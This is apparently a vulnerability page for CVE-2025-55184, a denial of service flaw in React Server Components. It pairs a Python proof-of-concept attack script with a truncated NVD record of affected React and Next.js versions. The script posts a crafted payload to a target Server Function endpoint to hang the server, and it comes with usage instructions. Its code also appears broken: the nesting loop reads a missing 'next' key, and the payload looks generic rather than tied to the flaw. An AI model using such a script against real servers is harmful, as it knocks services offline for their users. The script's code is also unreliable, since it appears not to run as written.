CVE-2025-55184

#!/usr/bin/env python3 """ CVE-2025-55184 PoC - React Server Components DoS This PoC demonstrates sending a malicious payload to trigger infinite loop in React Server Components' unsafe deserialization. """ import requests import json import sys from urllib.parse import urljoin def create_malicious_payload(): """ Create a malicious payload designed to trigger infinite loop during deserialization in React Server Components. The payload contains circular references that cause infinite recursion. """ # Create a payload with circular reference structure payload = { "__typename": "ServerFunction", "data": { "__proto": { "nested": { "__proto": { "recursive": { "__proto": {} } } } } }, "chunks": [], "format": "raw" } # Add deeply nested structure to trigger stack overflow current = payload for i in range(1000): current["nested"] = {"value": i, "next": {}} current = current["next"] return payload def exploit(target_url, endpoint="/api/server-function"): """ Send malicious request to target Server Function endpoint. """ full_url = urljoin(target_url, endpoint) headers = { "Content-Type": "text/plain", "Accept": "application/json", "X-React-Server-Components": "1.0" } payload = create_malicious_payload() print(f"[*] Sending malicious payload to: {full_url}") print(f"[*] Payload size: {len(json.dumps(payload))} bytes") try: response = requests.post( full_url, data=json.dumps(payload), headers=headers, timeout=10 ) print(f"[!] Response received: {response.status_code}") except requests.exceptions.Timeout: print("[!] Request timed out - server may be hanging!") except requests.exceptions.ConnectionError: print("[!] Connection failed - server may be down!") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url> [endpoint]") print(f"Example: python {sys.argv[0]} http://vulnerable-app.com /api/action") sys.exit(1) target = sys.argv[1] endpoint = sys.argv[2] if len(sys.argv) > 2 else "/api/server-function" exploit(target, endpoint)

{"cve": {"id": "CVE-2025-55184", "sourceIdentifier": "[email protected]", "published": "2025-12-11T20:16:00.610", "lastModified": "2025-12-15T17:15:53.073", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A pre-authentication denial of service vulnerability exists in React Server Components versions 19.0.0, 19.0.1 19.1.0, 19.1.1, 19.1.2, 19.2.0 and 19.2.1, including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints, which can cause an infinite loop that hangs the server process and may prevent future HTTP requests from being served."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:facebook:react:*:*:*:*:*:*:*:*", "versionStartIncluding": "19.0.0", "versionEndExcluding": "19.0.2", "matchCriteriaId": "4B63E074-FEA2-495B-98C6-9D74E343A1C0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:facebook:react:*:*:*:*:*:*:*:*", "versionStartIncluding": "19.1.0", "versionEndExcluding": "19.1.3", "matchCriteriaId": "4C133EED-6729-453F-B832-3E5A7EC22E92"}, {"vulnerable": true, "criteria": "cpe:2.3:a:facebook:react:*:*:*:*:*:*:*:*", "versionStartIncluding": "19.2.0", "versionEndExcluding": "19.2.2", "matchCriteriaId": "DE6F153C-825C-41B6-BE6F-2552A26307E0"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "13.3.0", "versionEndExcluding": "14.2.35", "matchCriteriaId": "6E0DE913-817F-40D2-BC98-0D610CCDE02A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "15.0.0", "versionEndExcluding": "15.0.7", "matchCriteriaId": "7F89ACED-432F-4789-A368-96D4E28DEE34"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.11", "matchCriteriaId": "99287D38-84D1-470A-96EF-B1D851552139"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "15.2.0", "versionEndExcluding": "15.2.8", "matchCriteriaId": "4E4E7989-19E3-44C5-B292-54C73FF3F356"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "15.3.0", "versionEndExcluding": "15.3.8", "matchCriteriaId": "78D397D2-B678-4463-85AB-8887554166C9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "15.4.0", "versionEndExcluding": "15.4.10", "matchCriteriaId": "137455D1-FCE0-4A58-A479-E7CA39EA969D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "15.5.0", "versionEndExcluding": "15.5.9", "matchCriteriaId": "7EFB67E0-24A1-4013-A654-C3EEAA2702DD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "16.0.0", "versionEndExcluding": "16.0.10", "matchCriteriaId": "009539CB-1F6D-446A-B581-1ABC70B10154"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:15.6.0:-:*:*:*:node.js:*:*", "matchCriteriaId": "3ED7F693-8012-4F88-BC71-CF108E20664A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:15.6.0:canary0:*:*:*:node.js:*:*", "matchCriteriaId": "40EE98AC-754A-4FD9-B51A-9E2674584FD9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:15.6.0:canary1:*:*:*:node.js:*:*", "matchCriteriaId": "13B41C54-AF21-4637-A852-F997635B4E83"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:15.6.0:canary10:*:*:*:node.js:*:*", "matchCriteriaId": "91B41697-2D70-488D-A5C3-CB9D435560CA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:15.6.0:canary11:*:*:*:node.js:*:*", "matchCriteriaId": "7D43DB84-7BCF-429B-849A-7189EC1922D0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:15.6.0:canary12:*:*:*:node.js:*:*", "matchCriteriaId": "CEC2346B-8DBD-4D53-9866-CFBDD3AACEF2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:15.6.0:canary13:*:*:*:node.js:*:*", "matchCriteriaId": "2BC95097-8CA6-42FE-98D7-F968E37C11B7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:15.6.0:canary14:*:*:*:node.js:*:*", "matchCriteriaId": "4F8FA85C-1200- ... (truncated)